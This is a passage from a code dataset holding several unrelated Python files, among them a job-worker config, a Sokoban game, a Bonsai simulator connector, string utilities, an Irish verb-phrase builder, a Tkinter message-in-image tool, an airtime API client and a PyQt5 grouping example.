port):\n return objectify({'queue': redis_program('queue', host, port, persisted_by_aof=True).queue_redis})\n\n\ndef resweb_program(resweb_host, resweb_port, queue_host, queue_port):\n return objectify({\n 'resweb': {\n 'execute_command': 'resweb',\n 'environment_variables': {'RESWEB_SETTINGS': VEIL_ETC_DIR / 'resweb.cfg'},\n 'resources': [('veil.backend.queue.resweb_resource', {\n 'resweb_host': resweb_host,\n 'resweb_port': resweb_port,\n 'queue_host': queue_host,\n 'queue_port': queue_port\n })]\n }\n })\n\n\ndef delayed_job_scheduler_program(queue_host, queue_port, logging_level):\n return objectify({\n 'delayed_job_scheduler': {\n 'execute_command': 'veil sleep 3 pyres_scheduler --host={} --port={} -l {} -f stderr'.format(queue_host, queue_port, logging_level),\n 'priority': 210,\n 'resources': [('veil_installer.component_resource', {'name': 'veil.backend.queue'})],\n 'startretries': 10\n }\n })\n\n\ndef periodic_job_scheduler_program(application_logging_levels, application_config):\n veil_logging_level_config_path = VEIL_ETC_DIR / 'periodic-job-scheduler-log.cfg'\n resources = [\n veil_logging_level_config_resource(path=veil_logging_level_config_path, logging_levels=application_logging_levels),\n component_resource(name='veil.backend.queue'),\n application_resource(component_names=list_dynamic_dependency_providers('periodic-job', '@'), config=application_config)\n ]\n return 
objectify({\n 'periodic_job_scheduler': {\n 'execute_command': 'veil backend queue periodic-job-scheduler-up',\n 'priority': 220,\n 'environment_variables': {\n 'VEIL_LOGGING_LEVEL_CONFIG': veil_logging_level_config_path,\n 'VEIL_LOGGING_EVENT': 'True'\n },\n 'redirect_stderr': False,\n 'resources': resources,\n 'patchable': True\n }\n })\n\n\ndef job_worker_program(worker_name, pyres_worker_logging_level, application_logging_levels, queue_host, queue_port, queue_names, application_config,\n run_as=None, count=1, timeout=120):\n veil_logging_level_config_path = VEIL_ETC_DIR / '{}-worker-log.cfg'.format(worker_name)\n application_component_names = set(name for queue_name in queue_names for name in list_dynamic_dependency_providers('job', queue_name))\n resources = [\n veil_logging_level_config_resource(path=veil_logging_level_config_path, logging_levels=application_logging_levels),\n component_resource(name='veil.backend.queue'),\n application_resource(component_names=application_component_names, config=application_config)\n ]\n pyrse_log_path = VEIL_LOG_DIR / '{}_worker-pyres.log'.format(worker_name)\n programs = {}\n for i in range(count):\n programs.update({\n '{}_worker{}'.format(worker_name, i + 1): {\n 'execute_command': 'veil sleep 10 pyres_worker --host={} --port={} -t {} -l {} -f {} {}'.format(\n queue_host, queue_port, timeout, pyres_worker_logging_level, pyrse_log_path, ','.join(queue_names)\n ), # log instruction for the main process, a.k.a pyres_worker\n 'environment_variables': {\n 'VEIL_LOGGING_LEVEL_CONFIG': veil_logging_level_config_path,\n 'VEIL_LOGGING_EVENT': 'True'\n }, # log instruction for the sub-process forked from pyres_worker, a.k.a our code\n 'group': 'workers',\n 'run_as': run_as or CURRENT_USER,\n 'priority': 200,\n 'resources': resources,\n 'startretries': 10,\n 'startsecs': 5,\n 'redirect_stderr': False,\n 'patchable': True\n }\n })\n return objectify(programs)","sub_path":"src/veil/backend/queue_setting.py","file_name":"queue_setting.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"4882589","text":"map = {\n \"size_x\": 5,\n \"size_y\": 5\n}\n\nplayer = { \"x\":3, \"y\":4}\n\nboxes = [\n {\"x\": 1,\"y\": 1},\n {\"x\": 2,\"y\": 2},\n {\"x\": 3,\"y\": 3}\n]\n\ndestination = [\n {\"x\": 2,\"y\": 1},\n {\"x\": 3,\"y\": 2},\n {\"x\": 4,\"y\": 3}\n]\nplayer1 = [0]\nbox1 = [0]\nplaying = True\nwhile playing:\n # print map\n for y in range(map['size_y']):\n for x in range(map['size_x']):\n\n player_is_here = False\n if y == player['y'] and x == player['x']:\n player_is_here = True\n\n box_is_here = False\n for box in boxes:\n if y == box['y'] and x == box['x']:\n box_is_here = True\n\n destination_is_here = False\n for des in destination:\n if y == des['y'] and x == des['x']:\n destination_is_here = True\n\n if player_is_here:\n print(\"P \", end='')\n elif box_is_here:\n print(\"B \", end='')\n elif destination_is_here:\n print(\"D \", end='')\n else:\n print(\"_ \", end='')\n print()\n # end of print map\n\n # checkwin\n win = True\n for box in boxes:\n if box not in destination:\n win = False\n\n if win:\n print(\"YOU WIN!!\")\n break\n \n dx = 0\n dy = 0\n\n move = input(\"Your move: \").upper()\n if move == \"W\":\n dy = -1\n elif move == \"S\":\n dy = 1\n elif move == \"A\":\n dx = -1\n elif move == \"D\":\n dx = 1\n elif move == \"Z\":\n player['x'] = 0 - last_step_player['x']\n player['y'] = 0 - last_step_player['y']\n for box in boxes:\n box['x'] = 0 - 
last_step_player['x']\n box['y'] = 0 - last_step_player['y']\n else:\n playing = False\n if 0 <= player['x'] + dx < map['size_x'] and 0 <= player['y'] + dy < map['size_y']:\n player['x'] += dx\n player['y'] += dy\n\n for box in boxes:\n if box['y'] == player['y'] and box['x'] == player['x']:\n box['x'] += dx\n box['y'] += dy\n player1[0] = {\"x\": dx,\"y\": dy}\n last_step_player = player1.copy()\n# copy/clone/deep clone","sub_path":"Session05/sokoban.py","file_name":"sokoban.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561697553","text":"\"\"\" This template implements the star.py <> ModelTrainer event pattern with the Matlab Python Engine.\npython hub.py --train-brain=brain_name\nstart python hub.py --brain sh1\n\"\"\"\n\nimport sys, argparse, logging, datetime, time, os, io\nimport numpy as np\nimport random\nimport psutil\nfrom star import Star\nfrom random import randint\nfrom bonsai_ai import Brain, Config, Simulator\nfrom bonsai_ai.logger import Logger\nfrom bonsai_ai import EpisodeStartEvent, SimulateEvent, \\\n\tEpisodeFinishEvent, FinishedEvent, UnknownEvent\n\nimport bonsai_tools\n\nlog = Logger()\nimport argparse\n\ndef _parse_args():\n\tparser = argparse.ArgumentParser(\n\t\tdescription='bits for dev')\n\tparser.add_argument('--log-iterations', action='store_true')\n\tparser.add_argument('--log-training-speed', action='store_true')\n\tparser.add_argument('--render', action='store_true')\n\targs, unknown = parser.parse_known_args()\n\treturn args\n\nlog_iterations = _parse_args().log_iterations\nmonitor_training_speed = _parse_args().log_training_speed\nrender = _parse_args().render\nprint('log iterations: {}'.format(log_iterations))\nprint('log training speed: {}'.format(monitor_training_speed))\nprint('render simulation: {}'.format(render))\n\nclass ModelConnector(Simulator):\n\n\tdef __init__(self, brain, name, config):\n\t\tsuper(ModelConnector, self).__init__(brain, name)\n\t\tself.results_logger = None\n\t\tif log_iterations is True:\n\t\t\tself.results_logger = bonsai_tools.log_initialize(brain, pathname='./log/')\n\t\tif monitor_training_speed is True:\n\t\t\tmonitoring_logger = bonsai_tools.log_initialize(brain, pathname='./log/', log_training_speed = True)\n\t\t\tlogged_observations_dict = {'datetime':None,'num_of_sims':None,'iterations':None,'num_iterations_per_s':None}\n\t\t\tbonsai_tools.log_observations_columns(monitoring_logger, logged_observations_dict)\n\t\t\tbonsai_tools.monitor_training(monitoring_logger,logged_observations_dict, brain.name)\n\t\n\t\tself.config = config\n\t\tpass\n\nclass ModelTrainer(object):\n\n\tdef __init__(self, sim, predict=False):\n\t\tself._sim = sim\n\t\tself.episode_count = 0\n\t\tself.reset_iteration_metrics()\n\t\tself.star = Star(predict=predict, render=render)\n\t\tself.star.logger = sim.results_logger\n\t\tif log_iterations is True:\n\t\t\tself.logged_observations = self.star.define_logged_observations()\n\t\t\tself.logged_observations = self.update_logged_observations(self.logged_observations)\n\t\t\tbonsai_tools.log_observations_columns(self.star.logger, self.logged_observations)\n\n\tdef episode_start(self,event):\n\t\tif getattr(self._sim, 'sim_id', -1) == -1:\n\t\t\tself.sim_id = self._sim._impl._sim_id\n\t\t\t#if self.sim_id != -1:\n\t\t\t# print('SimID', self.sim_id)\n\t\t\t\n\t\tself.start_episode()\n\t\tself.episode_count += 1\n\t\t# Check https://docs.bons.ai/references/library-reference.html#event-class for SDK 
event class documentation from Product\n\t\tevent.initial_state = self.star.get_state()\n\t\tevent.terminal = self.star.get_terminal(event.initial_state)\n\t\tevent.reward = 0 #the initial reward is an arbitrary value since there are no actions taken by BRAIN in initial state\n\t\tif log_iterations is True:\n\t\t\tself.logged_observations = self.star.define_logged_observations()\n\t\t\tself.logged_observations = self.update_logged_observations(self.logged_observations)\n\t\t\tbonsai_tools.log_iteration(self.star.logger, self.logged_observations)\n\n\tdef run(self):\n\t\tevent = self._sim.get_next_event()\n\n\t\tif isinstance(event, EpisodeStartEvent):\n\t\t\tlog.event(\"Episode Start Train\")\n\t\t\tself.episode_start(event)\n\n\t\t# Receive the action from the BRAIN as event.action, run the simulation one step and return the state, action, and reward to the BRAIN. \n\t\telif isinstance(event, SimulateEvent):\n\t\t\tlog.event(\"Simulate\")\n\t\t\tself.iteration_count += 1\n\t\t\tself.action = event.action\n\t\t\tself.star.set_action(self.action)\n\t\t\tevent.state = self.star.get_state() \n\t\t\tevent.terminal = self.star.get_terminal(event.state)\n\t\t\tevent.reward = self.star.get_reward(event.state, event.terminal)\n\t\t\t#print(event.state)\n\t\t\tself.reward = event.reward\n\t\t\tself.terminal = event.terminal\n\t\t\tself.episode_reward += event.reward\n\t\t\tself.logged_observations = self.star.define_logged_observations()\n\t\t\tself.logged_observations = self.update_logged_observations(self.logged_observations)\n\t\t\tif log_iterations is True:\n\t\t\t\tbonsai_tools.log_iteration(self.star.logger, self.logged_observations)\n\t\t\telse:\n\t\t\t\tbonsai_tools.print_progress(self.logged_observations)\n\n\t\t# The episode is terminal. Finish the episode. 
\n\t\telif isinstance(event, EpisodeFinishEvent):\n\t\t\tlog.event(\"Episode Finish\")\t\n\t\t\tprint(\"episode count: {}, iteration count: {}, episode reward: {:6.2f}\".format(\n\t\t\t\tself.episode_count, self.iteration_count, self.episode_reward))\n\n\t\telif isinstance(event, FinishedEvent):\n\t\t\tlog.event(\"Finished\")\n\t\t\treturn False\n\n\t\telif event is None:\n\t\t\treturn False\n\t\treturn True\n\n\tdef start_episode(self, config=None):\n\t\tself.star.simulator_reset_config()\n\t\tself.reset_iteration_metrics()\n\n\tdef reset_iteration_metrics(self):\n\t\t\"\"\"Executed once every start of episode\n\t\t\"\"\"\n\t\tself.reward = 0\n\t\tself.terminal = False\n\t\tself.episode_reward = 0.0\n\t\tself.iteration_count = 0\n\t\tself._cpu_pc = psutil.cpu_percent()\n\t\tself._vmem = psutil.virtual_memory().percent\n\t\t\n\tdef update_logged_observations(self, logged_observations):\n\t\tself._cpu_pc = psutil.cpu_percent()\n\t\tself._vmem = psutil.virtual_memory().percent\n\t\tupdated_observations = {\n\t\t\t'episode_count':self.episode_count,\n\t\t\t'iteration_count':self.iteration_count,\n\t\t\t'terminal':self.terminal,\n\t\t\t'reward':self.reward,\n\t\t\t'episode_reward':self.episode_reward,\n\t\t\t'cpu_pc':self._cpu_pc,\n\t\t\t'vmem':self._vmem\n\t\t}\n\t\t#updated_observations.update(self.action)\n\t\tupdated_observations.update(logged_observations)\n\t\treturn updated_observations\n\ndef run_brain():\n\tconfig = Config(sys.argv)\n\tbrain = Brain(config)\n\tprint(\"start connect\")\n\tsim = ModelConnector(brain, \"the_simulator\", config) #this sim name needs to match what is declared in inkling\n\tif brain.config.predict:\n\t\ttrainer = ModelTrainer(sim, predict=True)\n\t\tprint(\"start predicting\")\n\telse:\n\t\tprint(\"start training\")\n\t\ttrainer = ModelTrainer(sim, predict=False)\n\twhile trainer.run():\n\t\tpass\n\nif __name__ == \"__main__\":\n\trun_brain()","sub_path":"hub.py","file_name":"hub.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"122907688","text":"\"\"\"\nCopyright (c) 2017, 2019, Oracle Corporation and/or its affiliates. 
All rights reserved.\nLicensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.\n\nThis module provides string manipulation helper methods that are not found in the WLST version of Jython\n\"\"\"\nfrom wlsdeploy.logging.platform_logger import PlatformLogger\n\n__logger = PlatformLogger('wlsdeploy.util')\n_class_name = 'string_utils'\n\ndef is_empty(text):\n \"\"\"\n Determine if a string value is either None or an empty string.\n :param text: the string to test\n :return: True, if the string has no content, False otherwise\n \"\"\"\n return text is None or len(text) == 0\n\ndef rsplit(text, token=' ', maxsplit=-1):\n \"\"\"\n Returns a list of the words in the provided string, separated by the delimiter string (starting from right).\n :param text: the string should be rsplit\n :param token: token dividing the string into split groups; default is space.\n :param maxsplit: Number of splits to do; default is -1 which splits all the items.\n :return: list of string elements\n \"\"\"\n if maxsplit == 0:\n result = [text]\n else:\n components = text.split(token)\n if maxsplit > 0:\n desired_length = maxsplit + 1\n result = []\n if len(components) > desired_length:\n result.append('')\n for index, value in enumerate(components):\n if index < len(components) - maxsplit:\n if index > 0:\n result[0] += token\n result[0] += value\n else:\n result.append(value)\n else:\n result = components\n return result\n\ndef to_boolean(input_value):\n \"\"\"\n Convert the input value to a proper boolean value.\n :param input_value: the value to convert\n :return: the corresponding boolean value, or False if the value is not convertible to a boolean\n \"\"\"\n _method_name = 'to_boolean'\n\n if input_value in ['True', 'true', 1]:\n result = True\n elif input_value in ['False', 'false', 0]:\n result = False\n else:\n __logger.fine('WLSDPLY-01720', input_value, class_name=_class_name, method_name=_method_name)\n result = False\n return result\n","sub_path":"core/src/main/python/wlsdeploy/util/string_utils.py","file_name":"string_utils.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"622610462","text":"# coding=UTF-8\nfrom pygramadan.verb_tense_rule import VerbTenseRule\nfrom .attributes import Mutation, PERSON_MAP, VPMood, VPPerson, VPPolarity, VPShape, VPTense, VerbMood, VerbPerson\nfrom .verb import Verb\nfrom .opers import mutate\nfrom .forms import Form\n\n\nclass VP:\n def __init__(self,\n v: Verb = None) -> None:\n self.tenses = init_tenses()\n self.moods = init_moods()\n\n if v is not None:\n self._init_verb(v)\n\n def _init_verb(self, v: Verb) -> None:\n def check_nil(tm, sm, lm, valuem):\n a: bool = v.get_lemma == 'bí'\n b: bool = tm == VPTense.Pres\n c: bool = sm == VPShape.Declar\n d: bool = lm == VPPolarity.Neg\n e: bool = valuem.startswith('fhuil')\n return a and b and c and d and e\n t: VPTense = None\n p: VPPerson = None\n s: VPShape = None\n l: VPPolarity = None\n rule: VerbTenseRule = None\n for t in v.tense_rules:\n for p in v.tense_rules[t]:\n for s in v.tense_rules[t][p]:\n for l in v.tense_rules[t][p][s]:\n for rule in v.tense_rules[t][p][s][l]:\n for form in v.tenses[rule.tense][rule.dependency][rule.person]:\n particle = rule.particle\n if rule.particle == '':\n gap = ''\n else:\n gap = ' '\n value = mutate(rule.mutation, form.value)\n if rule.pronoun == '':\n gap2 = ''\n else:\n gap2 = ' '\n if check_nil(t, s, l, value):\n value = 
value.replace('fhuil', 'níl')\n particle = ''\n gap = ''\n new_value = f'{particle}{gap}{value}{gap2}{rule.pronoun}'\n self.tenses[t][s][p][l].append(Form(new_value))\n\n for pers in VPPerson:\n if pers == VPPerson.Any:\n continue\n has_synthetic = False\n for form in v.moods[VerbMood.Imper][PERSON_MAP[pers]]:\n pos = form.value\n neg = f'ná {mutate(Mutation.PrefH, form.value)}'\n self.moods[VPMood.Imper][pers][VPPolarity.Pos].append(Form(pos))\n self.moods[VPMood.Imper][pers][VPPolarity.Neg].append(Form(neg))\n has_synthetic = True\n\n if not has_synthetic or pers == VPPerson.Pl1 or pers == VPPerson.Pl3:\n for form in v.moods[VerbMood.Imper][VerbPerson.Base]:\n pos = form.value + _PRONOUNS[pers]\n neg = f'ná {mutate(Mutation.PrefH, form.value)}{_PRONOUNS[pers]}'\n self.moods[VPMood.Imper][pers][VPPolarity.Pos].append(Form(pos))\n self.moods[VPMood.Imper][pers][VPPolarity.Neg].append(Form(neg))\n has_synthetic = True\n\n for pers in VPPerson:\n if pers == VPPerson.Any:\n continue\n pos_mut = Mutation.Ecl1\n neg_mut = Mutation.Len1\n neg_part = 'nár'\n\n if v.get_lemma == 'abair':\n neg_mut = Mutation.NoMut\n if v.get_lemma == 'bí':\n neg_part = 'ná'\n\n has_synthetic = False\n for form in v.moods[VerbMood.Subj][PERSON_MAP[pers]]:\n pos = f'go {mutate(pos_mut, form.value)}'\n neg = f'{neg_part} {mutate(neg_mut, form.value)}'\n self.moods[VPMood.Subj][pers][VPPolarity.Pos].append(Form(pos))\n self.moods[VPMood.Subj][pers][VPPolarity.Neg].append(Form(neg))\n has_synthetic = True\n\n if not has_synthetic or pers == VPPerson.Pl1:\n for form in v.moods[VerbMood.Subj][VerbPerson.Base]:\n pos = f'go {mutate(pos_mut, form.value)} {_PRONOUNS[pers]}'\n neg = f'{neg_part} {mutate(neg_mut, form.value)} {_PRONOUNS[pers]}'\n self.moods[VPMood.Subj][pers][VPPolarity.Pos].append(Form(pos))\n self.moods[VPMood.Subj][pers][VPPolarity.Neg].append(Form(neg))\n has_synthetic = True\n\n def print_tense(self, tense, shape, pol) -> str:\n tmp = []\n for pers in VPPerson:\n if pers == VPPerson.Any:\n continue\n tmp.append(f'{pers.name}: [' + '] ['.join([f.value for f in self.tenses[tense][shape][pers][pol]]) + '] \\n')\n return ''.join(tmp)\n\n def print_mood(self, mood, pol) -> str:\n tmp = []\n for pers in VPPerson:\n if pers == VPPerson.Any:\n continue\n tmp.append(f'{pers.name}: [' + '] ['.join([f.value for f in self.moods[mood][pers][pol]]) + '] \\n')\n return ''.join(tmp)\n\n\n_PRONOUNS = {\n VPPerson.Sg1: \" mé\",\n VPPerson.Sg2: \" tú\",\n VPPerson.Sg3Masc: \" sé\",\n VPPerson.Sg3Fem: \" sí\",\n VPPerson.Pl1: \" muid\",\n VPPerson.Pl2: \" sibh\",\n VPPerson.Pl3: \" siad\",\n VPPerson.NoSubject: \"\",\n VPPerson.Auto: \"\"\n}\n\n\ndef init_tenses():\n \"\"\"initialises the tenses dict.\"\"\"\n tenses = {}\n for t in VPTense:\n if t == VPTense.Any:\n continue\n tenses[t] = {}\n for s in VPShape:\n if s == VPShape.Any:\n continue\n tenses[t][s] = {}\n for p in VPPerson:\n if p == VPPerson.Any:\n continue\n tenses[t][s][p] = {}\n for pol in VPPolarity:\n if pol == VPPolarity.Any:\n continue\n tenses[t][s][p][pol] = []\n return tenses\n\n\ndef init_moods():\n \"\"\"initialises the moods dict.\"\"\"\n moods = {}\n for m in VPMood:\n moods[m] = {}\n for p in VPPerson:\n if p == VPPerson.Any:\n continue\n moods[m][p] = {}\n for pol in VPPolarity:\n if pol == VPPolarity.Any:\n continue\n moods[m][p][pol] = []\n return 
moods\n","sub_path":"pygramadan/verb_phrase.py","file_name":"verb_phrase.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428504218","text":"from PIL import Image, ImageDraw\nimport Tkinter\nfrom tkFileDialog import askopenfilename\n \nclass Sipher(Tkinter.Tk):\n \n def __init__(self, parent, message = \"Test message\"):\n Tkinter.Tk.__init__(self, parent)\n self.parent = parent\n self.create_gui()\n \n def create_gui(self):\n self.grid()\n self.resizable(0,0)\n \n #Create Sipher frame\n self.create_sipher_frame = Tkinter.Frame(self, padx=5, pady=5)\n self.create_sipher_frame.grid(column=0, row=0, sticky='EW', padx=5, pady=5)\n \n #Create message entry\n self.message_input_label = Tkinter.Label(self.create_sipher_frame, text=\"Enter message to Sipher:\", anchor='w')\n self.message_input_label.grid(column=0, row=0, sticky='EW', pady=5, padx=5)\n \n self.message_input_text = Tkinter.Entry(self.create_sipher_frame, exportselection=0)\n self.message_input_text.grid(column=0, row=1, sticky='EW', padx=5)\n \n #Save file\n self.save_sipher_image_btn = Tkinter.Button(self.create_sipher_frame, text=\"Save Sipher\", command=self.handle_file_save_btn)\n self.save_sipher_image_btn.grid(column=0, row=2, sticky='EW', padx=5, pady=5)\n \n #DeSipher frame\n self.desipher_frame = Tkinter.Frame(self, padx=5, pady=5)\n self.desipher_frame.grid(column=1, row=0, sticky='EW', padx=5, pady=5)\n \n #Open file\n self.open_sipher_image_btn = Tkinter.Button(self.desipher_frame, text=\"Open Sipher\", command=self.handle_file_select_btn)\n self.open_sipher_image_btn.grid(column=1, row=1, sticky='EW', padx=5, pady=5)\n \n #DeSipher\n self.open_sipher_image_btn = Tkinter.Button(self.desipher_frame, text=\"DeSipher\", command=self.handle_desipher_btn)\n self.open_sipher_image_btn.grid(column=1, row=3, sticky='EW', padx=5, pady=5)\n \n #Current Info\n self.current_info_text_var = Tkinter.StringVar()\n self.current_info_text_var.set(\"Create or open an existing Sipher.\")\n self.current_info_text = Tkinter.Label(self, textvariable=self.current_info_text_var)\n self.current_info_text.grid(column=2, row=0, sticky='EW', padx=5, pady=5)\n \n def handle_file_select_btn(self):\n self.sipher_filename = askopenfilename(multiple=0)\n self.current_info_text_var.set(\"Current opened Sipher is: %s\" % self.sipher_filename)\n \n def handle_desipher_btn(self):\n desipher_message = self.read_image()\n \n def handle_file_save_btn(self):\n self.message = self.message_input_text.get()\n self.message_length = self.get_message_length(self.message)\n self.sipher_image = self.draw_image((self.message_length, 1))\n self.sipher_image.save(\"sipher.png\")\n \n #Image Write\n \n def draw_image(self, size):\n im = Image.new('RGB', size)\n self.draw = ImageDraw.Draw(im)\n self.draw_pixels(self.message)\n return im\n \n def draw_pixels(self, message):\n pos = 0\n for char in message:\n self.draw.point((pos, 0) , (ord(char), 0, 0))\n pos += 1\n \n #Image Read\n \n def read_image(self):\n self.open_sipher = Image.open(self.sipher_filename)\n self.desipher_message = list(self.open_sipher.getdata(0))\n self.desipher_string_chars = []\n for num in self.desipher_message:\n self.desipher_string_chars.append(chr(num))\n self.desipher_string = ''.join(self.desipher_string_chars)\n self.current_info_text_var.set(self.desipher_string)\n \n #Utilities\n \n def get_message_length(self, message):\n return len(self.message)\n \nif __name__ == \"__main__\":\n app = 
Sipher(None)\n app.title('Sipher')\n app.mainloop()\n","sub_path":"duh.py","file_name":"duh.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"537484990","text":"import code.fileWriteUtils as fo\nimport code.fileLoadUtils as fl\nimport codecs\n\ndict=fl.loadFullIdfDictAsMap(\"..\\\\data\\\\idfDict.txt\")\n# fout=codecs.open(\"..\\\\result\\\\ReducedIdf.txt\",'w','utf-8')\n\nreducedDict={}\nfor key in dict:\n if dict[key][0]==1 and dict[key][1]==1:\n continue\n else:\n reducedDict[key]=dict[key]\n\nfo.writeIdfDictToFile(reducedDict,\"..\\\\result\\\\ReducedIdf.txt\")\n\n\n\n","sub_path":"code/dictReduce.py","file_name":"dictReduce.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"236098785","text":"import os\nimport random\nimport shutil\n\n# We need to change the dataset so that it is split into train/validation/test\n# portions, and labelled with a single attribute (e.g. 'color').\n\nattributes = ('color', 'number', 'shape', 'shading', 'all')\n\nattribute_label_extraction_fns = {\n 'number': lambda dir: dir.split('-')[0],\n 'color': lambda dir: dir.split('-')[1],\n 'shading': lambda dir: dir.split('-')[2],\n 'shape': lambda dir: dir.split('-')[3].rstrip('s'), # remove trailing 's'\n 'all': lambda dir: dir\n}\n\ndef copyfile(src_dir, dest_dir, file):\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n shutil.copyfile(os.path.join(src_dir, file), os.path.join(dest_dir, file))\n\ndef create_split_datasets(dataset_dir, target_dir, label_extract_fn,\n train_split_percent, validation_split_percent, test_split_percentage):\n\n dirs = []\n for (dirpath, dirnames, filenames) in os.walk(dataset_dir):\n dirs.extend(dirnames)\n break\n\n target_train_dir = os.path.join(target_dir, 'train')\n target_validation_dir = os.path.join(target_dir, 'validation')\n target_test_dir = os.path.join(target_dir, 'test')\n\n for dir in dirs:\n subdir = os.path.join(dataset_dir, dir)\n files = os.listdir(subdir)\n random.shuffle(files)\n i1 = int(len(files) * train_split_percent / 100)\n i2 = int(len(files) * (train_split_percent + validation_split_percent) / 100)\n train, validation, test = files[:i1], files[i1:i2], files[i2:]\n label = label_extract_fn(dir)\n\n for file in train:\n copyfile(subdir, os.path.join(target_train_dir, label), file)\n for file in validation:\n copyfile(subdir, os.path.join(target_validation_dir, label), file)\n for file in test:\n copyfile(subdir, os.path.join(target_test_dir, label), file)\n\ndef create_single_attribute_test_dataset(dataset_dir, target_dir, label_extract_fn):\n dirs = []\n for (dirpath, dirnames, filenames) in os.walk(dataset_dir):\n dirs.extend(dirnames)\n break\n\n for dir in dirs:\n files = os.listdir(os.path.join(dataset_dir, dir))\n label = label_extract_fn(dir)\n for file in files:\n copyfile(os.path.join(dataset_dir, dir), os.path.join(target_dir, label),\n file)\n\nfor attribute in attributes:\n create_split_datasets('data/train-v2/labelled', f'data/{attribute}',\n attribute_label_extraction_fns[attribute],\n 70, 20, 10)\n create_single_attribute_test_dataset('data/test-v2', f'data/{attribute}-test',\n attribute_label_extraction_fns[attribute])\n \n# Create an artificially small training dataset to observe overfitting\ncreate_split_datasets('data/train-v2/labelled', f'data/shape-small',\n attribute_label_extraction_fns['shape'],\n 1, 20, 
79)","sub_path":"create-datasets-for-cnn.py","file_name":"create-datasets-for-cnn.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"84978358","text":"from schema import Schema, And, SchemaError\nimport json\nfrom . Service import APIService, validate_amount, validate_phone\n\n\nclass AirtimeService(APIService):\n def __init__(self, username, api_key):\n super(AirtimeService, self).__init__(username, api_key)\n\n def _init_service(self):\n super(AirtimeService, self)._init_service()\n self._baseUrl = self._baseUrl + '/version1/airtime'\n\n def send(self, phone_number=None, amount=None, recipients=None, callback=None):\n\n if phone_number is not None and amount is not None:\n recipients = [\n {'phoneNumber': str(phone_number), 'amount': str(amount)},\n ]\n\n try:\n schema = Schema([\n {\n 'phoneNumber': And(str, lambda s: validate_phone(s)),\n 'amount': And(str, lambda s: validate_amount(s))\n }\n ])\n recipients = schema.validate(recipients)\n except SchemaError as err:\n raise ValueError('Invalid recipients: ' + err.message)\n\n url = self._make_url('/send')\n data = {\n 'username': self._username,\n 'recipients': json.dumps(recipients)\n }\n return self._make_request(url, 'POST', headers=self._headers, params=None, data=data, callback=callback)\n","sub_path":"africastalking/Airtime.py","file_name":"Airtime.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"363712873","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n'''\nZetCode Advanced PyQt5 tutorial \n\nIn this example, we group items.\n\nAuthor: Jan Bodnar\nWebsite: zetcode.com \nLast edited: August 2017\n'''\n\nfrom PyQt5.QtWidgets import (QWidget, QApplication, QGraphicsScene, \n QGraphicsView, QGraphicsItemGroup, QGraphicsItem, \n QHBoxLayout)\nfrom PyQt5.QtGui import QPainter, QColor, QPen, QBrush\nfrom PyQt5.QtCore import Qt\nimport sys\n \n \nclass MyGroup(QGraphicsItemGroup):\n \n def __init__(self):\n super().__init__()\n \n self.setCursor(Qt.OpenHandCursor)\n self.setFlag(QGraphicsItem.ItemIsMovable)\n self.setFlag(QGraphicsItem.ItemIsSelectable, True)\n \n def paint(self, painter, option, widget):\n \n painter.setRenderHint(QPainter.Antialiasing)\n \n brush = QBrush(QColor(\"#333333\"))\n pen = QPen(brush, 0.5)\n pen.setStyle(Qt.DotLine)\n painter.setPen(pen)\n \n if self.isSelected():\n boundRect = self.boundingRect()\n painter.drawRect(boundRect) \n \n\nclass Scene(QGraphicsScene):\n \n def __init__(self):\n super().__init__() \n \n self.initScene()\n \n \n def initScene(self): \n \n self.r1 = self.addRect(20, 50, 120, 50)\n self.r1.setFlag(QGraphicsItem.ItemIsMovable)\n self.r1.setFlag(QGraphicsItem.ItemIsSelectable, True)\n \n self.r2 = self.addRect(150, 100, 50, 50)\n self.r2.setFlag(QGraphicsItem.ItemIsMovable)\n self.r2.setFlag(QGraphicsItem.ItemIsSelectable, True)\n\n self.c = self.addEllipse(30, 150, 60, 60)\n self.c.setFlag(QGraphicsItem.ItemIsMovable)\n self.c.setFlag(QGraphicsItem.ItemIsSelectable, True)\n \n\nclass View(QGraphicsView):\n \n def __init__(self):\n super().__init__()\n \n self.setGeometry(300, 300, 300, 300)\n \n policy = Qt.ScrollBarAlwaysOff\n \n self.setVerticalScrollBarPolicy(policy)\n self.setHorizontalScrollBarPolicy(policy)\n self.setRenderHint(QPainter.Antialiasing)\n self.setDragMode(QGraphicsView.RubberBandDrag)\n \n self.init()\n \n \n def init(self):\n \n self.group = None \n self.scene 
